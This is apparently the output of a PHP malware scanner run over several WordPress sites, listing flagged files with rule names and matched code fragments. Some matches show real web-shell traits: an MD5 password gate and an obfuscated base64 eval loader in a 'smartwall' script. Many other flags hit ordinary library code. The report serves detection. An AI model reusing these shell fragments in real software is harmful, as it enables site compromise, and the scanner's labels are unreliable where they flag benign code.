//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/kazan/data/www/intim-kazani.info/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 12:53:18 Modified: 2020-09-27 13:01:19 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/kazan/data/www/intim-kazani.info/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 12:53:19 Modified: 2020-09-27 13:01:19 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/kazan/data/www/intim-kazani.info/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 12:53:19 Modified: 2020-09-27 13:01:18 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2021-11-12 13:56:02 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.98 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7580 Dangerous Hacker credits |
Hacked by
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 12.02 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 186.03 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Net/SFTP/Stream.php Size: 21.28 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 182 Warning Double var technique is usually used for the obfuscation of malicious code |
${$host}
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Net/SSH2.php Size: 167.84 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFF...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command, $callback = null) { $this->curTimeout = $this->timeout; $this->is_timeout = false; $this->stdErrorLog = ''; if (!$this->isAuthenticated()) { return false; } if ($this->in_request_pty_exec) { user_error('If you want to run multiple exec()\'s you will need to disable (and re-enable if appropriate) a PTY for each one.'); return false; } $this->window_size_server_to_client[self::CHANNEL_EXEC] = $this->window_size; $packet_size = 0x4000; $packet = pack( 'CNa*N3', NET_SSH2_MSG_CHANNEL_O...
| Sign 91535293 Line: 19 Dangerous Malware Signature (hash: 91535293) |
ls -la
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Net/SSH1.php Size: 51.43 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 1 Dangers: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($cmd, $block = true) { if (!($this->bitmap & self::MASK_LOGIN)) { user_error('Operation disallowed prior to login()'); return false; } $data = pack('CNa*', NET_SSH1_CMSG_EXEC_CMD, strlen($cmd), $cmd); if (!$this->_send_binary_packet($data)) { user_error('Error sending SSH_CMSG_EXEC_CMD'); return false; } if (!$block) { return true; } $output = ''; $response = $this->_get_binary_packet(); if ($response !== false) { do { $output.= substr($response[self::RESPONSE_DATA], 4); $response = $this->...
| Sign 11413268 Line: 1084 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 91535293 Line: 18 Dangerous Malware Signature (hash: 91535293) |
ls -la
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/System/SSH/Agent.php Size: 10.00 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Sign 91535293 Line: 21 Dangerous Malware Signature (hash: 91535293) |
ls -la
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Crypt/RSA.php Size: 109.46 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Sign 19ee5b66 Line: 230 Dangerous Malware Signature (hash: 19ee5b66) |
.ssh/authorized_keys
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Crypt/Base.php Size: 100.43 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit php_uname Line: 2674 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('m')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$func = function ($_action, &$self, $_text) { ' . $init_crypt . 'if ($_action == "encrypt") { ' . $encrypt . ' } else { ' . $decrypt . ' } };'); return $func; } function &_getLambdaFunctions() { static $functions = array(); return $functions; } function _hashInlineCryptFunction($bytes) { if (!isset(self::$WHIRLPOOL_AVAILABLE)) { self::$WHIRLPOOL_AVAILABLE = extension_loaded('hash') && in_array('whirlpool', hash_algos()); } $result = ''; $hash = $bytes; switch (true) { case self::$WHIRLPOOL...
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Crypt/Hash.php Size: 28.64 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 2
| Description | Match |
|---|
Exploit php_uname Line: 870 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('m')
| Sign 471b95ee Line: 525 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/www-root/data/www/android-apk.fun/adminer2.php Size: 356.21 kB Created: 2022-10-23 14:54:44 Modified: 2022-10-23 14:54:44 Dangers: 4
| Description | Match |
|---|
Function strrev eval_strrev Line: 782 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
LAVE
| Sign 085a0329 Line: 10 Dangerous Malware Signature (hash: 085a0329) |
ini_get("filter.default_flags")){foreach
| Sign 471b95ee Line: 584 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
| Sign f9dc0a55 Line: 580 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:50:49 Modified: 2020-07-24 20:09:55 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:55 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 37.62 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.34 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 652 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 9.95 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 31.62 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.14 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 40 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.84 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 70 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-12 14:00:40 Modified: 2021-05-12 14:00:40 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
|
//var/www/msk/data/www/intimcity-msk.club/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:09:56 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
